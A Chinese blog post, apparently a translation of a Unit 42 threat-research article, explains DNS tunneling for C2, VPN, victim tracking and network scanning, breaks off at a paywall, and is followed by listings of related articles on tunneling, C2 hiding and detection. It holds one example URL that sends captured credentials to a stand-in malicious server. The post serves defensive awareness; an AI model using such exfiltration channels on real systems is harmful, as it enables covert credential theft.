DNS 隧道技术用于掩藏C2和VPN以及扩大用户跟踪和网络扫描的范围

最新推荐文章于 2025-02-07 22:35:46 发布
原创 最新推荐文章于 2025-02-07 22:35:46 发布 · 1.7k 阅读 · 23 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #安全 #DNS

威胁狩猎,本文介绍了域名系统 (DNS) 隧道在野外的新应用的案例研究
翻译:
https://unit42.paloaltonetworks.com/three-dns-tunneling-campaigns/

概述
本文介绍了域名系统 (DNS) 隧道在野外的新应用的案例研究。这些技术不仅仅用于简单的命令和控制(C2)和虚拟专用网络(VPN)目的的DNS隧道。它们的应用范围已经超出了最初设计的用途。

恶意行为者有时会使用 DNS 隧道作为隐蔽通信通道。这使得他们能够绕过传统的网络防火墙,隐藏 C2 流量并从传统检测方法中窃取数据。

然而,我们最近发现了三个活动,其中 DNS 隧道被用于传统 C2 或 VPN 以外的目的。其目的是扫描和跟踪。在扫描的情况下,攻击者使用 DNS 隧道来扫描受害者的网络基础设施并收集对未来攻击有用的信息。为了进行跟踪,攻击者使用 DNS 隧道技术来跟踪恶意电子邮件的传送并监控内容传送网络 (CDN) 的使用情况。

本文提供了一个详细的案例研究,揭示了攻击者如何使用 DNS 隧道进行扫描和跟踪。我们希望本文的介绍能够提高人们对这些新用例的认识,并提供进一步的见解,帮助安全专业人员更好地保护他们的网络。

DNS 隧道
DNS 隧道将信息嵌入 DNS 请求和响应中。这样做允许受攻击者妥协的主机通过 DNS 流量与其控制下的名称服务器进行通信。下图 1 显示了一个示例。
DNS 隧道的典型用例涉及以下步骤:

攻击者首先注册一个域(例如, male[.]site )。接下来,设置使用 DNS 隧道作为通信通道的 C2 服务器。攻击者可以通过多种方式建立 C2 通道,包括利用Cobalt Strike 。
攻击者编写、开发或获取作为客户端与服务器通信的恶意软件,然后将该恶意软件传递到受感染的客户端计算机。
受感染的机器通常位于防火墙后面。这意味着它无法直接与攻击者的服务器通信。然而,该恶意软件能够对恶意站点子域内的数据进行编码,并对 DNS 解析器执行 DNS 查询(图 1)。
用于隧道的完全限定域名 (FQDN) 应该是唯一的,因此 DNS 解析器无法在其缓存中找到相应的记录。这会导致解析器递归查询攻击者下的域的根域名服务器、顶级域 (TLD) 域名服务器和权威域名服务器。
攻击者可以解码 DNS 流量以检索数据并操纵 DNS 响应以将恶意数据窃取到客户端。
在这里插入图片描述
图 1.通过 DNS 隧道进行数据泄露和渗透的概述。
DNS 隧道是如何隐藏的?
DNS 隧道被三个因素隐藏:

传统防火墙可以拒绝未经授权的流量。然而,用户数据报协议 (UDP) 端口 53 上的 DNS 流量非常普遍,防火墙和其他网络安全措施通常允许这种流量。
DNS 隧道使用 DNS 协议的实现,并通过受感染客户端和攻击者服务器之间的逻辑通道执行。这意味着客户端计算机不直接与攻击者的服务器通信。这进一步有助于隐藏。
攻击者通常使用自己定制的方法对他们在数据外泄或渗透过程中发送的数据进行编码,从而使数据隐藏在看似合法的 DNS 流量中。
攻击者如何使用 DNS 隧道
使用 DNS 隧道进行 C2 允许攻击者建立隐秘且有弹性的通信通道,使攻击者更容易执行数据外泄、渗透和其他恶意活动。DarkHydrus、OilRig、xHunt、SUNBURST和Decoy Dog等著名活动都利用 DNS 隧道进行 C2。

攻击者使用的 DNS 记录类型包括:

IPv4(A)
IPv6(AAAA)
邮件交换 (MX)
别名记录 (CNAME)
文本 (TXT)
一些 VPN 供应商可能会使用 DNS 隧道来绕过防火墙来绕过互联网审查或网络服务费用。
除了 C2 和 VPN 目的之外,攻击者还可能使用 DNS 隧道进行跟踪和扫描目的。在最近的隧道挖掘活动中也观察到了这种用法。

用于跟踪目的的 DNS 隧道
攻击者可以使用 DNS 隧道来跟踪与垃圾邮件、网络钓鱼和广告内容相关的受害者行为。攻击者通过向受害者分发恶意域并将受害者的身份信息编码在该域的子域的有效负载中来实现跟踪。
用于扫描目的的 DNS 隧道
攻击者可能会使用欺骗性的源 IP 地址并将 IP 地址和时间戳编码在隧道有效负载中来扫描您的网络基础设施。然后,攻击者可以发现开放解析器并利用这些解析器中的漏洞来执行 DNS 攻击。这可能会导致恶意重定向和拒绝服务 (DoS)。
为了更好地理解这两个新用例,以下部分描述了我们观察到的使用 DNS 隧道进行跟踪和扫描的活动。

用于跟踪目的的 DNS 隧道
在传统的 C2 通信中,黑客通常会利用一种叫做C2通信的方法来远程控制受害者的计算机。在这种方法中,黑客会把受害者的行为数据(比如访问过的网页、输入的密码等)隐藏在一个网址里,然后通过网络把这个网址发送到他们控制的服务器。这种方式看起来就像是正常的网络活动,所以不容易被发现。
示例:
受害者访问了一个网页,其URL是:

http://example.com/page
恶意软件捕获了这个URL,并记录了受害者在页面上的键盘输入,比如:

username=xz&password=12345
然后,恶意软件将这些数据编码后嵌入到新的URL中,例如:

http://malicious-server.com/track?data=http%3A%2F%2Fexample.com%2Fpage%26username%3Dxz%26password%3D12345
在这个

最低0.47元/天 解锁文章
一切尽在黑客掌控之中!利用DNS隧道的目标跟踪网络扫描
网络战争的博客
03-27 656
Palo Alto Networks的Unit 42安全研究团队最近发现,在涉及受害者跟踪网络扫描的恶意活动中还额外使用了DNS隧道。具体来讲就是威胁行为者正在使用域名系统 (DNS) 隧道来跟踪其目标何时打开网络钓鱼电子邮件并单击恶意链接,并扫描网络以查找潜在漏洞。DNS隧道是对通过DNS查询发送检索的数据或命令进行编码,本质上是将DNS(基本网络通信组件)转变为隐蔽的通信通道。
DNS隧道技术原理及其典型应用场景剖析
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
10-13 1858
博主原计划通过搭建一条DNS隧道来详解其工作原理,花了些时间尝试了几个免费域名申请网站,均无法正常使用。就连Freenom都暂停提供免费域名了,因其托管了大量滥用域名被起诉了。而收费的域名又需要进行实名认证,认证及审核流程复杂暂且就算了吧~后续有机会博主会再利用文中提到的隧道工具进行实战演练,敬请关注~
域前置技术C2隐藏
蚁景网安学院
11-09 1972
域前置又译为域名幌子,是一种隐藏连接真实端点来规避的技术。在应用层上运作时,域前置使用户能通过HTTPS连接到被屏蔽的服务,而表面上像在与另一个完全不同的站点通信。
[译文] 恶意代码分析:3.利用DNS隧道进行跟踪扫描
杨秀璋的专栏
05-31 1664
前文介绍了LNK文件伪装成证书执行RokRAT恶意软件,并利用Powershell命令发起无文件攻击执行相关行为。这篇文章将详细讲解DNS隧道的两个新技术——跟踪扫描。 在扫描过程中,攻击者利用DNS隧道技术扫描受害者的网络基础设施,并收集对未来攻击有用的信息;在追踪过程中,攻击者则运用DNS隧道技术来追踪恶意电子邮件的发送,并监控CDN的使用情况。基础性技术文章,希望您喜欢!
【亲测免费】 探秘DNSC2:一款高效、安全DNS控制台工具
gitblog_00037的博客
04-08 572
探秘DNSC2:一款高效、安全DNS控制台工具 项目简介 是一个轻量级且强大的DNS(域名系统)管理工具,由BurpHeart开发。它旨在提供简洁的命令行界面,让用户能够轻松地进行DNS解析记录的增删查改操作,适用于需要频繁调整DNS配置或者希望对DNS服务有更高控制权的开发者运维人员。 技术分析 基于Python:DNSC2采用Python语言编写,这使得其具备高度的可读性易扩展性,对...
流影之隧道通讯行为检测,发现C2数据窃取威胁
开源流影项目的博客
07-07 1039
流影集成了ICMP隧道通讯DNS隧道通讯检测模型,实现网络隐蔽通讯行为发现告警,留存了通讯相关特征,便于用户取证分析,能够帮助用户及时发现隧道通讯行为,尽快做出响应,避免更大损失。
VPN VPS DNS 等专业名词解析
qq_72985002的博客
12-21 1987
例如,.com表示商业用途,.org表示非盈利组织,.net表示网络服务,.edu表示教育机构,.gov表示政府部门。通过使用 CDN,用户可以从距离更近的边缘节点获取内容,减少了传输延迟网络拥塞,从而提高了加载速度响应时间。隧道端口转发:SSH 还提供了隧道端口转发的功能。例如,在www.example.com中,“com”是顶级域,“example”是二级域,“www”是三级域。CDN 是一种分布式计算存储系统,通过将内容分发到位于全球不同位置的服务器上,以提供更快速、可靠的内容传输访问。
DNS隧道技术
weixin_45007073的博客
05-01 3345
DNS隧道技术安全中的DNS协议dnscat2iodine防御DNS隧道攻击各种隧道技术的优缺点 安全中的DNS协议 DNS的解析原理我们可以参考以下文章 https://blog.youkuaiyun.com/baidu_37964071/article/details/80500825 DNS协议是一种请求/应答协议,也是一种可用于应用层的隧道技术。因为传统的socket隧道已经濒临淘汰及TCP、UDP通信大量被防御系统拦截的状况,DNS、ICMP、HTTP/HTTPS等难以被禁用的协议已成为攻击者控制隧道的主流渠
DAY173内网对抗-隧道技术篇&防火墙组策略&ICMP&DNS&SMB协议&出网判断&C2上线&解决方案
m0_74402888的博客
12-28 1006
ICMP 通过 PING 命令访问远程计算机,建立 ICMP 隧道,将 TCP/UDP 数据封装到 ICMP 的 PING 数据包中,从而穿过防火墙,防火墙一般不会屏蔽 PING 数据包,实现不受限制的访问。2隧道技术篇-传输层-DNS协议-判断&封装&建立&穿透(可上线C2但不支持搭建socks代理)1、隧道技术篇-网络层-ICMP协议-判断&封装&建立&穿透(可上线C2并搭建socks代理)3、隧道技术篇-表示层-SMB协议-判断&封装&建立&穿透(需要口令横向移动上线C2)
VPN深度解析:构建安全网络的关键技术
qq_44005305的博客
08-26 4762
VPN,即虚拟私人网络(Virtual PrivateNetwork),是一种网络技术,用于在公共网络上创建一个安全网络连接。它允许用户通过加密的隧道在互联网上发送接收数据,从而保护数据免受拦截窥探。VPN不仅加密数据,还能隐藏用户的IP地址,提供匿名性绕过地理位置限制的能力。这使得VPN成为了保护个人隐私、安全访问敏感资源(如远程办公系统)、以及安全浏览公共Wi-Fi网络的重要工具。无论是个人用户还是企业,VPN都提供了一种在不安全网络环境中安全通信的有效手段。
DNSC2 使用指南
gitblog_00042的博客
09-12 433
DNSC2 使用指南 项目介绍 DNSC2 是一款由 BurpHeart 开发的高效、安全DNS 控制台工具,专为简化 DNS 管理而设计。它采用 Python 编写,支持命令行操作,从而为 DevOps 工作流提供了便利。该工具的特点在于批量处理DNS记录的能力,版本控制友好的JSON配置文件,以及与CI/CD流程的无缝集成,非常适合需要频繁调整DNS配置或寻求更高级别DNS控制权的开发者及...
DNS恢复 VPN篡改计算机DNS
K_BuQieFu的博客
05-01 8746
经常性使用vpn后,vpn私自修改了电脑的dns,一系列软件的网络连接出现问题,建议每次使用完毕,先关闭节点,然后关闭vpn软件,随后关闭计算机。
网安三剑客:DNS、CDN、VPN
最新发布
02-07 1657
DNS 是一个传统的网络地址转换协议,提供地址管理、数据完整性安全性。 CDN 则通过加速内容访问速度,提升用户体验并增强安全性。 VPN 作为一种加密通信技术,提供了额外的安全保障,帮助用户在内部网络中保持完整不被窃取。
基于CDN实现隐藏c2真实地址
dreamer292的博客
09-26 1816
通过cdn的配置实现隐藏c2的真实地址。
爱快使用VPN
我的博客
02-14 7925
网络连接 > VPN连接 > 属性 > 网路 > Internet 协议 > 高级 > 去掉在远程网络上使用默认网关勾选。意思是:所有发往192.168.2.0地址段的IP,全部由10.0.0.2转发,其中10.0.0.2VPN客户端IP。爱快支持花生壳、3322dnspod、aliyun、huaweicloud。下文以dnspod为例。设置 > 网络 Internet > VPN > 添加VPN。认证计费 > 认证账号管理 > 账号管理 > 添加。网络设置 > 端口映射 > 端口映射 > 添加。
DNSC2 项目使用教程
gitblog_00153的博客
09-13 351
DNSC2 项目使用教程 1. 项目目录结构及介绍 DNSC2 项目的目录结构如下: dnsc2/ ├── client/ │ ├── client.go │ ├── go.mod │ ├── go.sum │ └── ... ├── server/ │ ├── server.go │ ├── go.mod │ ├── go.sum │ └── ... ├── LI...
DNS隧道检测特征
WangYouJin321的博客
03-07 7196
参考连接: DNS隧道检测特征总结 - 知乎 基于DNS隐蔽信道的攻击与检测 - FreeBuf网络安全行业门户 1.DNS检测特征 BotDAD中统计分析了15种DNS的行为特征,如下: 序号 DNS特征 描述 p1 每小时DNS请求的数量 受感染的僵尸主机每小时的请求数量往往高于正常主机。 p2 每小时不同的DNS请求数 感染DGA恶意软件的主机往往比普通主机具有更多不同的请求。 p3 单个域的最大请求数 帮助检测DNS隧道,敏感信.
DNS隧道
03-31 5395
简介 本片文章主要介绍如何使用DNS隧道对内网进行穿透,搭建隧道,使得外网机器可以直接访问内网主机,DNS隧道也是比较常见的搭建隧道的方式。 DNS基础 DNS简介 DNS协议主要就是用来在你访问主机域名的时候查询对应的IP地址并返回给你的协议,计算机是根据IP地址MAC地址来进行通信的。通过DNS可以将域名(方便记忆)自动转换成IP地址来进行通信,这就是DNS的作用。 查询域名对应的IP地址只是DNS可以查询的记录的一种,常见的可查询记录类型如下 类型 内容 A 域名的IPv4 记录
Cobalt Strike:解密 DNS 流量——第 5 部分
爱我非你莫属的博客
05-06 2428
博文系列:Cobalt Strike:解密流量 Cobalt Strike:使用已知私钥解密流量 - 第 1 部分 Cobalt Strike:使用已知私钥解密流量 - 第 2 部分 Cobalt Strike:使用进程内存解密流量 - 第 3 部分 Cobalt Strike:解密混淆流量 - 第 4 部分 Cobalt Strike:解密 DNS 流量 - 第 5 部分(当前) Cobalt Strike:内存转储 - 第 6 部分 Cobalt Strike:概述 – 第 7 部分 Cobalt S
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值